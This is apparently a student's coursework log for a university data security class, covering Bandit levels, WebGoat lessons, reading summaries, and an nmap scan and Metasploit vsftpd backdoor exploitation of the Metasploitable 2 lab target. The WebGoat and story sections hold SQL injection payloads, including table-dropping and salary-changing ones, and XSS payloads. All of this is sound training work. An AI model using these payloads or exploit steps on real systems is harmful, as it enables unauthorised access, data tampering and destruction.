Data Security

Data Security ICT4TF022-3008 - early spring, 2022.
Haaga-Helia University of Applied Sciences
Teacher: Tero Karvinen.

---

H1, Become a hacker, step 0

Exercise Z
Read and summarize:
- Hutchins et al 2011: Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains, chapters Abstract, 3.2 Intrusion Kill Chain and 3.3 Courses of Action
- Karvinen 2020: Command Line Basics Revisited
- Karvinen 2021: Install Debian on VirtualBox
- Karvinen 2021: Install Webgoat 8 - Learn Web Pentesting

Exercise A
Bandit oh-five. Solve Over The Wire: Bandit the first five levels (0-4).

Exercise B
Bullseye. Install Debian 11-Bullseye virtual machine in VirtulBox.

Exercise C
WebGoat. Install WebGoat practice target.

Exercise D
Hacker warmup. Solve these tasks on WebGoat
General: HTTP Basics
General: Developer tools

---

Equipment used:
Lenovo L580 laptop, purchased 2018
- Processor: Intel Core i7-8550U, 4 cores
- Ram: 16GB
- Operating system: Windows 10 Pro, 64bit, build 19044
Virtualization:
Oracle VM VirtualBox, version 6.1.32
Debian-live-11.2.0-amd64-xfce+nonfree
- Ram: 4GB
- Cores: 1

---

Exercise Z

z) Read and summarize. (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary)

- Hutchins et al 2011: Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains, chapters Abstract, 3.2 Intrusion Kill Chain and 3.3 Courses of Action
- Karvinen 2020: Command Line Basics Revisited
- Karvinen 2021: Install Debian on VirtualBox
- Karvinen 2021: Install Webgoat 8 - Learn Web Pentesting

Command Line Basics

I have used Linux before, so I am familiar with the basic commands, But I think it's never a bad thing to go back and look at the basics.

A few commands I think will be useful in this class is:
sudo To run commands as superuser
ssh For connecting to computers
man To look at manuals of new commands
/,~, /home/, /etc/, cd Important directories and how to move between them

Karvinen 2021: Install Debian on VirtualBox

If you have problems installing Linux on VirtualBox, read this. I have done it before using this guide.

Karvinen 2021: Install Webgoat 8 - Learn Web Pentesting

I followed these instructions to install webgoat. The most important thing is that after this the computer very vulnerable to attacks, so don’t do this to a computer that is used for anything else. Use a dedicated virtualmachine that is not connected to the internet.

---

Exercise A

Bandit oh-five. Solve Over The Wire: Bandit the first five levels (0-4).

Bandit Level 0 (20.01.2022)

Level Goal
The goal of this level is for you to log into the game using SSH. The host to which you need to connect is bandit.labs.overthewire.org, on port 2220. The username is bandit0 and the password is bandit0. Once logged in, go to the Level 1 page to find out how to beat Level 1.

I am familiar with using ssh from previous classes. I opened terminal (you could use windows cmg), by default ssh uses port 22, so I need to use a flag to use a different port. Let's see what the manual has to say:
$ man ssh

So I use -p to set a different port, all the rest of the info I need is in the assignment.
$ ssh bandit0@bandit.labs.overthewire.org -p 2220

Bandit Level 0 → Level 1 (20.01.2022)

Level Goal
The password for the next level is stored in a file called readme located in the home directory. Use this password to log into bandit1 using SSH. Whenever you find a password for a level, use SSH (on port 2220) to log into that level and continue the game.

Where am I? $ pwd
Answer: /home/bandit0
So in homefile of bandit, just were I want to be. Let's see what I have in this folder.
$ ls
A readme file, let's see what it has inside.
$ cat readme
Seems like the password I am after.

Now I log on to user bandit1 and use the password I just got.
$ ssh bandit1@bandit.labs.overthewire.org -p 2220

And I'm in.

Bandit Level 1 → Level 2, (20.01.2022)

Level Goal
The password for the next level is stored in a file called - located in the home directory

I need to read a file named -, I cant just type cat -, it thinks I want to use a flag. So let's try to give it the full filepath,
$ cat /home/bandit1/-

Now I have the password for the next level and can log in to bandit2.
$ ssh bandit2@bandit.labs.overthewire.org -p 2220
And give the password I just got.

Works like a charm.

Bandit Level 2 → Level 3, (20.01.2022)

Level Goal
The password for the next level is stored in a file called spaces in this filename located in the home directory

I have a filename that has spaces it it, I cant cat that, so I put the filename inside "".
$ cat "spaces in this filename"

Success, ones again!

Bandit Level 3 → Level 4, (20.01.2022)

Level Goal
The password for the next level is stored in a hidden file in the inhere directory.

A hidden file in the 'inhere' folder, I'll go there and find it.
$ cd inhere
$ ls
Nothing, so I try show all flag (-a) to ls command.
$ ls -a
There It is, file named .hidden. Cat that and I have the password for the next level.
$ cat .hidden

Bandit Level 4 → Level 5, (Debian 11.2, 20.01.2022)

Level Goal
The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

Trial and error, cat files until I find the one, ctrl+c if things get out of hand.
$ cat /home/bandit4/inhere/-file00

---

Exercise B

Bullseye. Install Debian 11-Bullseye virtual machine in VirtulBox.

New VM

I open VirtualBox and press "New" and give a name to the virtual machine. I will call it Debian11DataSecurity, just to keep things clear in the future. After that, I need to give some RAM to it, this laptop has 16GB, so I can easily give 4GB and keep everything running smooth. I press 'Create' and then I need to give it some hard drive space, I gave it 25BG, not going to need all the space but there is enough to spare, and it only uses what it needs.

I can add a bit more CPU power to it if I would need under settings and system. I only have 4 in this laptop, so will stay at 1 for the VM. Now I have a empty shell and still need to install a operating system on it.

Install Debian 11

First I need to download Debian 11 from debian.org, I chose 'Debian-live-11.2.0-amd64-xfce+nonfree'.

I start the VM and press the folder button, search the downloaded .iso file and add it. Then press 'start'.

Now I get the Main Menu for installation. Choose 'Debian installer'

I went thru the installation process mostly just clicking next and yes. When choosing a password for Root and your user, REMEMBER to always choose strong passwords.

And now I have a new install of Debian 11.2!

User->Sudo

I need to make the user a sudo, so that I don’t need to use root user. I login as Root and give the user johan sudo and adm privileges. # sudo adduser johan sudo
# sudo adduser johan adm

I can check if this works by login into johan and running a command that needs sudo privileges or by checking what groups johan belongs to.
$ sudo apt-get update
$ groups

---

Exercise C

WebGoat. Install WebGoat practice target.

WebGoat

I started with a new debian VM install that I am not going to use on anything else than webgoat.
For this i followed the instuctions on https://terokarvinen.com/2020/install-webgoat-web-pentest-practice-target/

Install java, firewall (ufw), wget and enable firewall
$ sudo apt-get update
$ sudo apt-get install openjdk-11-jre ufw wget
$ sudo ufw enable

Install webgoat from git and run it
$ wget https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M26/webgoat-server-8.0.0.M26.jar
$ java -jar webgoat-server-8.0.0.M26.jar

Then I go to http://localhost:8080/WebGoat/ and see if it is working.

Perfect!

---

Exercise D

d) Hacker warmup. Solve these tasks on WebGoat
- General: HTTP Basics
- General: Developer tools

HTTP Basics

The guide is good, I just read it and did what was taught. I opened the inspect element to see what was the secret number.

Developer tools

Never used developer tools to write javascript or anything else like this. But it was easy to follow the gide and worked well, and i did understand what i was doing.

---

H2, Oh, wasp!

Exercise Z
Read and summarize
- OWASP: OWASP 10 2021
- A05:2021-Security Misconfiguration
- A06:2021-Vulnerable and Outdated Components
- Any episode from Darknet Diaries.

Exercise A
Sequel. Solve SQLZoo:
0 SELECT basics
2 SELECT from World

Exercise B
Injected. Solve WebGoat:
A1 Injection (intro)

---

Equipment used:
Lenovo L580 laptop, purchased 2018
- Processor: Intel Core i7-8550U, 4 cores
- Ram: 16GB
- Operating system: Windows 10 Pro, 64bit, build 19044
Virtualization:
Oracle VM VirtualBox, version 6.1.32
Debian-live-11.2.0-amd64-xfce+nonfree
- Ram: 4GB
- Cores: 1

---

Exercise Z

z) Read and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like)

OWASP: OWASP 10 2021
- A05:2021-Security Misconfiguration
- A06:2021-Vulnerable and Outdated Components

Any episode from Darknet Diaries.

A05:2021-Security Misconfiguration

Systems can be misconfigured in many ways. Users don’t need to change their default passwords, servers have unnecessary services online, or the systems are just not updated.
https://owasp.org/Top10/A05_2021-Security_Misconfiguration/

A06:2021-Vulnerable and Outdated Components

Applications use components and dependencies that are made by other people, the application itself could be safe, but some of the parts used could have security flaws and not be patched.
You should know all the versions of all the components a used.
Remove components and dependencies that you don’t needed.
Always use official sources
https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/

Darknet Diaries ep 92: The Pirate Bay

Intresting talk about the history of piratebay and the technology and people behind it. And ofcourse all the difference attacks and raids against it.
https://darknetdiaries.com/episode/92/

---

Exercise A

a) Sequel. Solve SQLZoo:
0 SELECT basics
2 SELECT from World

Exercises from https://sqlzoo.net/wiki/SQL_Tutorial

0 SELECT basics

The table world looks like this,

1
It is showing the population of France, but I want Germany, so i'll change the name of the country. SELECT population
FROM world
WHERE name = 'France'
to
SELECT population
FROM world
WHERE name = 'Germany'

2
Now I have multiple country names to change.
SELECT name, population
FROM world
WHERE name IN ('Brazil', 'Russia', 'India', 'China');
to
SELECT name, population
FROM world
WHERE name IN ('Sweden', 'Norway', 'Denmark');

3
The last one want me to find countries that have an area between 200,000 and 250,000 sq. km. Now I just change the query to that information.
SELECT name, area
FROM world
WHERE area BETWEEN 250000 AND 300000
to
SELECT name, area
FROM world
WHERE area BETWEEN 200000 AND 250000

Quiz
Easy quiz, but this is just the first introduction and SQL in not new stuff for me.

2 SELECT from World

The table world

1
This is just to show what happens when running this SQL command.
SELECT name, continent, population
FROM world

2
The command now shows counries that have exactly 64105700 population, I want to change that to be over 200000000 population.
SELECT name
WHERE population = 64105700
to
SELECT name WHERE population > 200000000

3
I want the name and GDP per capita (GDP/population) of countries that have population of over 200 mill.
SELECT name, gdp/population
FROM world
WHERE population > 200000000

4
Name and population in millions of the continent 'South America'.
SELECT name, population/1000000
FROM world
WHERE continent = 'South America'

5
Name and population for France, Germany and Italy, I use the same WHERE name IN('') as before.
SELECT name, population
FROM world
WHERE name IN ('France', 'Germany', 'Italy')

6
Now I want countries that have the name "united" in them, I use % sign to show that the name "united" can be anywhere in the countryname.
SELECT name
FROM world
WHERE name LIKE ('%United%')

7
Show if over 3mil sq km or population over 250mil.
SELECT name, population, area
FROM world
WHERE area > 3000000 OR population >250000000

8
Big by population or big by area, I use XOR like instructed.
SELECT name, population, area
FROM world
WHERE area > 3000000 XOR population >250000000

9
Using ROUND in SQL was new to me, i used the help page to find out how to use ithttps://sqlzoo.net/wiki/ROUND.
SELECT name, ROUND(population/1000000,2), ROUND(gdp/1000000000,2)
FROM world
WHERE continent = 'South America'

10
Now I use ROUND and -3 to get round to nearest 1000.
SELECT name, ROUND(gdp/population,-3)
FROM world
WHERE gdp > 1000000000000

11
Then lenght of the counryname is the same as the lenght of capitals name.
SELECT name, capital <
FROM world
WHERE LENGTH(name) = LENGTH(capital)

12

SELECT name, capital
FROM world
WHERE LEFT(name,1) = LEFT(capital,1) AND name <> capital

13
There maybe a easier solution, but this is what i came up with.
SELECT name
FROM world
WHERE name LIKE '%a%'
AND name LIKE '%e%'
AND name LIKE '%i%'
AND name LIKE '%o%'
AND name LIKE '%u%'
AND name NOT LIKE '% %'

Quiz

---

Exercise B

Injected. Solve WebGoat:
A1 Injection (intro)

A1 Injection (intro)

2

Try to retrieve the department of the employee Bob Franco. Note that you have been granted full administrator privileges in this assignment and can access all data without authentication.

I get all the info needed; table name (employees), column names (department and last_name) and the name of the employee (Bob Franco).
SELECT department
FROM employees
WHERE last_name = 'Franco'

3
I have admin priviliges to the table, so I can change information in it.
The example uses userid, so lets use it here, I know Tobi Barnet userid is 89762.

https://www.w3schools.com/sql/sql_update.asp for a quick check how UPDATE was used.
UPDATE employees
SET department = 'Sales'
WHERE userid = 89762

4
Here I want to 'alters the structure of the existing database' so I use ALTER. Help can be found here: https://www.w3schools.com/sql/sql_alter.asp
ALTER TABLE employees
ADD phone varchar(20)

5
For numer five I want to give the user 'UnauthorizedUser' priviliges to ALTER tables.
Adding priviliges is always fun, if it just was this easy all the time.
GRANT ALTER TABLE
TO UnauthorizedUser

10
Here I have a loginfield, on page6 in the intro I had an example to show all entries; 'Smith' OR '1' = '1'. Here I have numers, not names so lets try it like this;
'0' OR '1' = '1'

11
Here I need to insert something in this part of the query, and get it to not use the auth_tan that comes after it.
WHERE last_name = '" + name + "' I can leave the name empty, and use -- to comment out the authentication.
' OR 1=1 --
So the query would look like this WHERE last_name = '' OR 1=1 --" + name + "' AND auth_tan = '" + auth_tan + "';' OR 1=1 --

12
Here I can use the same idea as in numer 3, but instead of department I use salary. The ; is used to add more commands to the query. I dont want to use a name so I just use ' in the beginning. And want comment out the authentication prosess at the and. For the salary just a bit over what Bob makes is good, I dont want to get caught.
'; UPDATE employees SET salary = 84000 WHERE userid = 37648 --

13
Dropping tabeles is not hard. I use the same things as before, no name, chain command and I know the name of the table I want to delete and comment out the rest of the query, DONE!
'; DROP TABLE access_log --

---

H3, Tricks, Tips and Playbooks

Equipment used:
Lenovo L580 laptop, purchased 2018
- Processor: Intel Core i7-8550U, 4 cores
- Ram: 16GB
- Operating system: Windows 10 Pro, 64bit, build 19044
Virtualization:
Oracle VM VirtualBox, version 6.1.32
Debian-live-11.2.0-amd64-xfce+nonfree
- Ram: 4GB
- Cores: 1

---

Exercise Z

z) Read and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like)
Mitre 2022: ATT&CK Enterprise Matrix
Give examples of a single, easy technique in each tactic. Which is the easiest?
Explain technique, subtechnique, tactic and procedure. Give example of each.
Describe a procedure (a brief description is enough, no need to repeat all steps listed)

OWASP: Cross Site Scripting (XSS)

Mitre 2022: ATT&CK Enterprise Matrix

Mitre ATT&CK is a set of tactics and techniques used by threat hunters, red teamers, and defenders to better classify attacks and assess an organization's risk. By understanding the techniques that are used against them an organization can better determine how to mitigate and detect them.

Easy techniques:

Reconnaissance - Search Open Websites/Domains
Open-Source Intelligence is an easy and good way to start finding information on other people or companies.

Resource Development - Establish Accounts
If a Facebook account has a history, friends and other information, you are more likely to accept the friend request.

Initial Access - Exploit Public-Facing Application
Starting off by searching for weaknesses in the systems that you may want to use, ex web pages.

Execution - Exploitation for Client Execution
Using the weaknesses found in software of browsers.

Persistence - Browser Extensions
Malicious extensions can be used to scan everything that is done in browser and steal the information shown.

Privilege Escalation - Valid Accounts
Using credentials of existing accounts to gain access

Defense Evasion - Impair Defenses
An attacker can hinder or disable defensive mechanisms, not only firewalls and anti-virus, but also detection capabilities that can be used to log activity and identify malicious behavior.

Credential Access - Brute Force
A brute force attack uses programs that can guess passwords for as long as it takes to find the right one.

Discovery - Account Discovery

Lateral Movement - Remote Services
If the attacker can obtain a set of valid domain credentials, they could log in to many different machines using remote access.

Collection - Automated Collection
Using automated tools for collecting data based on file type, location or name.

Command and Control - Remote Access Software
Using desktop support and remote access software to access the target environment. These programs are used frequently as technical support software, and maybe allowed by application control within a target environment.

Exfiltration - Exfiltration Over Web Service

Impact - Data Encrypted for Impact
Make stored data inaccessible by encrypting files or data and demand money for the data

Techniques

Techniques is how to achieve the goal by performing an action. For example, an adversary may dump credentials to achieve credential access.

Subtechniques

These are subcategories of techniques, they are a way to describe a specific implementation of a technique in more detail.

Tactics

Tactics is the "why", the reason for performing an action. For example, the attacker may want to achieve credential access.

https://attack.mitre.org/matrices/enterprise/

Cross Site Scripting

XSS is a form of injection attack that allows the attacker to inject code in websites. The users web browser can't recognize that the code it receives is malicious, it already trusts the website it's on, so it will run the code.

https://owasp.org/www-community/attacks/xss/

---

Exercise Y

y) Cross Site Story. Write a short story or draw a comic of a cross site scripting attack. Make roles clear: who attacks? Who runs, what code, where? What unauthorized access is gained? (This subtask y does not require any tests with a computer.).

XSS story

Tim has a web page that he uses as an online portfolio, it has all the stuff he has done, from small school projects to big work projects. He made the page himself, of course, why pay money to someone else, and it's one more thing he can add to his portfolio. The page even has a search, so that is easier to find things on his page.

One day a young kid, Jake, stumbled upon a reddit post where Tim showed his site and asked for some help, he was trying to make the page look more 2020 and needed some input on design ideas. Jake feels left out in life and he wants to make a name for himself, and the perfect opportunity just arises, he will hack Tim’s page and post it, then everyone will want to be his friend.

Jake noticed that Tims page is running a search and the address bar lets you input the search words, like this: ...timsportfolio.pro/search?q= So he tried a basic alert, to see if the page accepts it
...timsportfolio.pro/search?query=<script>alert("Hello World");</script>

It worked, he got a popup, now it’s time to do something bigger. He send the next script to change the first heading of the page.
<script>document.getElementsByTagName("h1")[0].innerHTML = "HackedByJakeTheBeast";</script>
Now just a screenshot and start sending it around!

---

Exercise A

a) Webgoat: A3 Sensitive data exposure
Insecure Login: 2 Let's try

Wireshark

First, I install Wireshark
$ sudo apt-get install wireshark -y
Start Wireshark, double click on "any". Now I only want POST:s so let’s put that in "apply display filter"

Go back to WEBGOAT and press "Log in", then check back to Wireshark. Wireshark got us two packets, let’s find out what they got inside.

At the very end of the first packet, I have what I want, a username and password.

Lets try it out!

Exercise B

b) Webgoat: A7 Cross Site Scripting (XSS): Cross site scripting
2 What is XSS?
7 Try It! Reflected XSS

Webgoat: A7 Cross Site Scripting (XSS)

2
Here I use f12 in browser to get console and run JavaScript, the code snippet is given to us:
javascript:alert(document.cookie);
The cookies were the same

7
I want to know what field is prone to XSS attacks, so I try a basic 'hello world' script in the fields. The field that worked was 'credit card number:'
<script>alert('HelloWorld')</script>

---

---

H4, intelligence gap

Equipment used:
Lenovo L580 laptop, purchased 2018
- Processor: Intel Core i7-8550U, 4 cores
- Ram: 16GB
- Operating system: Windows 10 Pro, 64bit, build 19044

Virtualization:
Oracle VM VirtualBox, version 6.1.32
Debian-live-11.2.0-amd64-xfce+nonfree
- Ram: 4GB
- Cores: 1
Metasploitable: 2.0.0
- Ram: 4GB
- Cores: 1
kali-linux-2021.4a-amd64
- Ram: 4GB
- Cores: 1

---

Exercise Z

z) Read (or watch or listen) and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like)

€ Santos et al: The Art of Hacking (Video Collection): 3. Passive Reconnoissance: 3.0 - 3.4 (five videos, about 35 min)

€ Santos et al: The Art of Hacking (Video Collection): 4. Active Reconnaissance: 4.0 - 4.3 (four videos, about 20 min)

Lyon 2009: Nmap Network Scanning: Chapter 15. Nmap Reference Guide: Port Scanning Basics (what's open, closed and filtered? This is a sample chapter from a book by the author of nmap, Gordon Lyon aka Fyodor Vaskovich)

3. Passive Reconnaissance

Passive and active Reconnaissance is a very important step in getting information of the systems you are trying to attack and this step should not be skipped.
Passive recon is when you do not try to connect to the target. Browsing sites is still passive, port scanning is not.
Searching for public data is a good and easy way to get to know the systems and employees of the target. Using google, certificates, hostnames and domain information. Searching; Site:example.com pdf shows pdf files that is on that site, you could get lucky and find something that will help you attack the system.
Search names and passwords from published breaches and match names you found to the employee of the company you found from open-source intelligence.

4. Active Reconnaissance

The reconnaissance is active when you start sending information, like port scans, and could trigger alarms in the system you scan. And is illegal in many places.
The more you scan and dig, the "louder" you get and if the system is monitored you risk getting caught. Good reconnaissance gives you the info you need, without getting caught, so not necessary to go "all in" at first contact.
A good starting point is to first do port scanning, then web service review and at the end vulnerability scanning.

Nmap

Open port is and open and has a program answering
Closed port is there, but has no program answering
Filtered Nmap can't figure out if the port is open or not, the packets sent by can’t reach the port

---

Exercise A

a) My networks. Add a new vboxnet internal network to your VirtualBox (File: Host Network Manager...)

Internal Network

Internal Network

When you configure one or more VM's to sit on an Internal network, VirtualBox ensures that all traffic on that network stays within the host and is only visible to VM's on that virtual network.
The internal network is a totally isolated network and so is very "quiet". This is good for testing when you need a separate, clean network

A host-only network has the host device in the same network as the VM's, I want to keep my host away from this network, so will make an internal network that only my VM's has access to.

Open VirtualBox, press "settings" on the VM I want to change the network on, go to "Network" and change "Attached to:" to "Internal network", for this I make a new network, just write the name you want.

DHCP

The internal network has no DHCP (Dynamic Host Configuration Protocol) server settings ready, so I need to make them
For this part, I followed an article by Kapil Verma on how to add DHCP to the internal network. The DHCP is assigning IP addresses automatically for the devices connected to the network and is needed for the network to work.
https://54m4ri74n.medium.com/building-an-internal-network-in-virtualbox-d0a4974882d0

Open windows cmd (Command Prompt), go to the path of oracle install files, for me it's C:\Program Files\Oracle\VirtualBox
I use vboxmanage.exe to setup the dhcp server to SecNet1, the parameters I need is listed here:
netname : The internal network name
IP: The IP address of your DHCP server inside the internal network.
netmask: The subnet mask.
lowerip: The start of the IP addresses that can be assigned to network members.
upperip: The end of the same thing.
enable: Enable the DHCP server.

So the command in full looks like this:
vboxmanage dhcpserver add --netname SecNet1 --ip 10.10.10.1 --netmask 255.255.255.0 --lowerip 10.10.10.2 --upperip 10.10.10.212 --enable

Use vboxmanage list dhcpservers to see the one I just created.

Login to the VM and check if the dhcpserver gives us a IP, and yes it did, the IP for this VM, in our internal network in 10.10.10.2

---

Exercise B

b) Punchbag. Install Metasploitable 2 practice target on Virtual Box, and only connect it to your new virtual network. Login to Metasploitable 2 and find out its IP address.

Metasploitable 2

First I download Metasploitable 2 from https://www.vulnhub.com/entry/metasploitable-2,29/. The installation process is a bit different, fist I choose "New", give it a name, type is Linux and version is Ubuntu, ram (2GB is recommended) I did 4Gb. Now in Hard disk, I "use an existing virtual hard disk file" and add the metasploitable.vmdk that was in the downloaded folder. Then just press Create and I are done

Connect this new VM to the same internal network as the VM that I want to use in the attacks.

Start the WM and log in, login is "msfadmin" and the default password "msfadmin" and check the IP (10.10.10.3). This is the IP I will use to attack this VM.

---

Exercise C

c) Hero arrives. Connect the Linux computer you've been using to the same network (e.g. Debian 11-bullseye).

Both are using 'SecNet1'

---

Exercise D

d) Hello sploitable! Open the website on Metasploitable 2. If you can't open the expected website, you're not looking at the correct computer, don't run any scans or any similar tests.

Connection

Start both VM's, metasploitable and the one you are going to do the attacking with. Then just open a browser and head to http://Insert_IP_of_metasploitable2_VM_here. Remember, not https:// !

---

Exercise E

e) Scanalyses. Port scan Metasploitable 2. Analyze the results. This is a big task: explain all you can understand from the results. Is there something untypical for a server publicly visible on the Internet? Do you think some services could be especially vulnerable, a good start for the initial foothold? You explation should take the main part of your answer. Make sure you only port scan the correct computer. Disconnect your host computer from the Internet as needed.

Nmap

$ sudo nmap -sV 10.10.10.3
Scan the top 1000 ports
-sV detects versions
Some modification to how this list looks made on 07.04.2022

PORT	STATE	SERVICE	VERSION
21/tcp	open	ftp	vsftpd 2.3.4
22/tcp	open	ssh	OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp	open	telnet	Linux telnetd
25/tcp	open	smtp	Postfix smtpd
53/tcp	open	domain	ISC BIND 9.4.2
80/tcp	open	http	Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp	open	rpcbind	2 (RPC #100000)
139/tcp	open	netbios-ssn	Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp	open	netbios-ssn	Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp	open	exec	netkit-rsh rexecd
513/tcp	open	login	OpenBSD or Solaris rlogind
514/tcp	open	shell	Netkit rshd
1099/tcp	open	java-rmi	GNU Classpath grmiregistry
1524/tcp	open	bindshell	Metasploitable root shell
2049/tcp	open	nfs	2-4 (RPC #100003)
2121/tcp	open	ftp	ProFTPD 1.3.1
3306/tcp	open	mysql	MySQL 5.0.51a-3ubuntu5
3632/tcp	open	distccd	distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp	open	postgresql	PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp	open	vnc	VNC (protocol 3.3)
6000/tcp	open	X11	(access denied)
6667/tcp	open	irc	UnrealIRCd
6697/tcp	open	irc	UnrealIRCd
8009/tcp	open	ajp13	Apache Jserv (Protocol v1.3)
8180/tcp	open	http	Apache Tomcat/Coyote JSP engine 1.1
8787/tcp	open	drb	Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42496/tcp	open	status	1 (RPC #100024)
46288/tcp	open	java-rmi	GNU Classpath grmiregistry
47724/tcp	open	nlockmgr	1-4 (RPC #100021)
52763/tcp	open	mountd	1-3 (RPC #100005)

Next scan is a bit wider, so I will just post parts of it I find interesting:
$ sudo nmap -A -p- 10.10.10.3
-A to enable OS detection, version detection, script scanning, and traceroute
-p- to scan ports from 1 through 65535

21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
FTP (File Transfer Protocol) is for file transfer. This ftp version has a backdoor vulnerability and the "Anonymous FTP login allowed" could be a way to look inside the server.
https://www.cvedetails.com/cve/CVE-2011-2523/

23/tcp open telnet Linux telnetd
Like ssh but uses plaintext, so the data and login information is not encrypted. Should not be used in public networks for this reason.
https://en.wikipedia.org/wiki/Telnet#Security

25/tcp open smtp Postfix smtpd
Simple Mail Transfer Protocol, so a email service.
https://en.wikipedia.org/wiki/Telnet#Security

53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
"BIND (Berkely Internet Name Domain) is a popular software for translating domain names into IP addresses and usually found on Linux servers."
First time i hear this name, but seems to be an DNS server. The version 9.4.3 seems to be Vulnerable to insertion of malicious DNS records into the DNS server. Many exploit for this version, ex: 'Remote DNS Cache Poisoning'.
https://www.cvedetails.com/cve/CVE-2008-1447/
https://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-436267/ISC-Bind-9.4.2.html

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS

Apache is a webserver, now hosting the "frontpage" for metasploitable 2 on http://10.10.10.3. Latest version now (11.02.2022) is 2.4.46, the version 2.2.8 has exploits. There could be other ways in thru the webpage itself.
https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2008-2364
https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2010-0408
111/tcp open rpcbind 2 (RPC #100000)
What RPC is or does did not become so clear to me.

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Samba is used for filesharing for windows clients.

512/tcp open exec netkit-rsh rexecd

This is a password-based remote execution program to allow users of a network to execute commands remotely. Should not be open.

513/tcp open login OpenBSD or Solaris rlogind
Remote login like Telnet or SSH, again a way in that should not be here

514/tcp open shell Netkit rshd
Remote shell for sending commands to the server. Should not be open.

1099/tcp open java-rmi GNU Classpath grmiregistry
Java registry service that allows java queries to be run, could be exploitable.

1524/tcp open bindshell Metasploitable root shell
Some kind of backdoor

2049/tcp open nfs 2-4 (RPC #100003)
Linux Network File System for sharing data, why is this open?

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
Database services, should not be accessible.
MySQL version is from 2007 and PostgresSQL from 2008. Old version could have vulnerabilities.

5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)

Remote desktop access, old version and exploitable.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0167

6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
IRC servers, it's been along time since i have used IRC, so might be a good ting to check this out.

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
A few apache related services, Tomcat in port8180 could be intresting to check out using the browser 10.10.10.3:8180
https://en.wikipedia.org/wiki/Apache_Tomcat

8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
Ruby programing, allows remote method calls between Ruby processes on different machines.
Metasploit has a exploit for this version to get root access.
https://en.wikipedia.org/wiki/Distributed_Ruby

My toughts

There are alot of ports open, that is not normal.
Many of the programs running are old version and are easily exploitable using ready made exploits.
There are many different programs for remote access, each has its own users and is very difficult to manage them all.

---

Exercise F

f) Volunteer task: it's raining shells. Break into Metasploitable 2. As an added bonus, do it using multiple methods. Only do this using methods you're able to use safely, so that attacks only target Metasploitable 2 practice target.

Port21

For this, I installed Kali Linux, and this will be my first time using it. I found out that the FTP server in port 21 is something I want to try out, so let's scan it again and se what I can do about it.
$ sudo nmap -p21 10.10.10.3 -A

The program is vsftpd and version is 2.3.4. I can use metasploit (The world’s most used penetration testing framework,https://www.metasploit.com/ ) to find and use vulnerabilities. First I neet to start it, it was already installed on Kali, so no need to do anything else.
$ msfconsole

To search I type:
msf6 > search vsftpd 2.3.4

One was found and it's 'Rank: excellent', so i think it will be good for us, lets use it.
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Port is there already, I still need to add the IP.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3

The settings is good to go, start exploiting!
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[+] 10.10.10.3:21 - Backdoor service has been spawned, handling...
[+] 10.10.10.3:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.10.10.4:43889 -> 10.10.10.3:6200 ) at 2022-02-13 04:45:26 -0500
I should be root and have the console open, let's try it!

Yes, I are root!

Time to test it!
I go to /var/www/
Here I have a index.php, let's do something to it.
echo "Johan was here!" >> index.php

And see the changes!

---

H5

---

Exercise Z

z) Read (or watch or listen) and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like)
Schneier 2015: Applied Cryptography: Chapter 1: Foundations

Applied Cryptography

Symmetric: One key to encrypt and decrypt

Asymmetric: Different keys for encrypting and decrypting. The message is encrypted using the receivers public key and can only be opened using the receivers private key

Substitution cipher: Replacing the plaintext letter for other characters

Steganography: Hiding the message inside some other data, like a picture.

Cryptography: Study of how to keep message secure.

Cryptanalysis: Study of how to break the encryptions.

When sending a message that you do not want others to see; you first write it in plaintext, then it is encrypted into ciphertext and sent. At the receiving end the ciphertext is decrypted back to plaintext. Cryptography gives the message confidentiality and even authentication of a certain degree, if using asymmetric algorithms.

